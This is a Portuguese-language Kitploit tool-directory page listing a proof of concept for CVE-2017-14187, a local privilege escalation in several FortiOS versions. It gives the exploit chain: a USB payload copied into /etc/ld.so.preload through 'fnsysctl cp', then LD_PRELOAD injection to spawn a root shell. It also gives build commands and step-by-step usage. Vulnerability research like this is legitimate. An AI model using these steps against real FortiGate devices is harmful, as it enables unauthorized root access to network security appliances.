Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2017-14187_PoC_ARMv7 — LPE para FortiOS 5.6.0 a 5.6.2, 5.4.0 a 5.4.8 e abaixo de 5.2 | Kitploit
Ferramentas/GitHubGitHub/0xsigill/cve-2017-14187_poc_armv7
Escalada de PrivilégiosAnálise de VulnerabilidadesExploraçãoTestes de PenetraçãoAprendizado e EducaçãoRed Teaming
GitHub0xsigill/cve-2017-14187_poc_armv7

CVE-2017-14187_PoC_ARMv7

LPE para FortiOS 5.6.0 a 5.6.2, 5.4.0 a 5.4.8 e abaixo de 5.2

Ver Repositório
1há 4 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Prova de Conceito CVE-2017-14187

Prova de Conceito de Escalação de Privilégio Local para FortiOS 5.6.0 a 5.6.2, 5.4.0 a 5.4.8 e versões abaixo de 5.2
Acionado por fnsysctl e USB (portanto, acesso físico necessário).
Este PoC gera um shell root local explorando o CVE-2017-14187.

Análise

Korean
English
TL;DR

  1. fnsysctl cp /usb/payload_path_file /etc/ld.so.preload
  2. fnsysctl ls -> LD_PRELOAD Injection -> Arbitrary Code Execution -> LPE(restricted shell escape)

Compilar a partir do código-fonte

root@kitploit:~
git clone https://github.com/0xSIGILL/CVE-2017-14187_PoC_ARMv7.git
cd CVE-2017-14187_PoC_ARMv7
make

Siga as instruções em seguida.

...ou você pode obter uma versão pré-compilada no release do github!

Uso

  1. Prepare um drive USB. O drive USB deve ter uma partição MBR e sistema de arquivos FAT32 ou FAT16.
  2. Extraia o pré-compilado baixado para o USB ou copie o conteúdo do diretório de compilação para o seu drive USB.
  3. Insira-o no seu dispositivo FortiGate vulnerável.
  4. Abra o console via webui de administrador.
  5. Obtenha acesso system_admin. Se você não sabe o que é, consulte o documento oficial da Fortinet "config system admin"
  6. Digite "fnsysctl cp /usb/ld.so.preload /etc" e então insira suas credenciais de conta super_admin.
  7. Digite "fnsysctl ls" ou qualquer comando que desejar. Isso instalará alguns links simbólicos para o shell Busybox. Tente mais uma vez. Então você obterá um shell.

Este PoC instala um monte de utilitários úteis para depuração. Dropbear, GDB, neofetch, e mais!

Aviso Legal 면책 조항

Este projeto tem fins educacionais para demonstrar a vulnerabilidade CVE-2017-14187 no FortiOS. Ele não deve ser usado para atividades ilegais, violação de regras ou atividades prejudiciais não autorizadas.
이 프로젝트는 FortiOS에 존재하는 CVE-2017-14187 취약점을 시연하기 위한 교육적 목적으로 만들어졌으며, 불법적 활동이나 규칙을 위반하는 행위, 또는 기타 허가받지 않은 유해한 활동에 사용하는 것을 금지합니다.
É fornecido no estado 'COMO ESTÁ' (AS IS). Eu não tenho responsabilidades legais explícitas ou implícitas, nem garantias de qualquer tipo.
이 코드는 그 자체로만 제공되며, 어떠한 종류의 명시적, 또는 묵시적인 보증이나 법적 책임이 제공되지 않음을 명시합니다.
Distribuído sob a Licença Pública Geral GNU v3.0 (GPLv3).
GPLv3 라이선스 하에 배포됩니다.
Verifique o LICENSE para mais detalhes.
세부 사항을 보려면 LICENSE를 참조하세요.
FortiOS®, FortiGate® são marcas registradas da Fortinet, Inc.
FortiOS®, FortiGate®는 Fortinet, Inc.의 상표입니다.
Este projeto não está relacionado com a Fortinet, Inc.
이 프로젝트는 Fortinet, Inc.와 연계되지 않았습니다.

해당 프로젝트는 대한민국 법률을 준수합니다. 이 코드는 공격이나 전산 침해를 위하여 설계된 것이 아니며 개인이 직접 소유한 기기에 물리적 접근을 통해 보안 연구를 위한 디버깅 환경을 구축하는 것에 목적이 있습니다.

Baixar ferramenta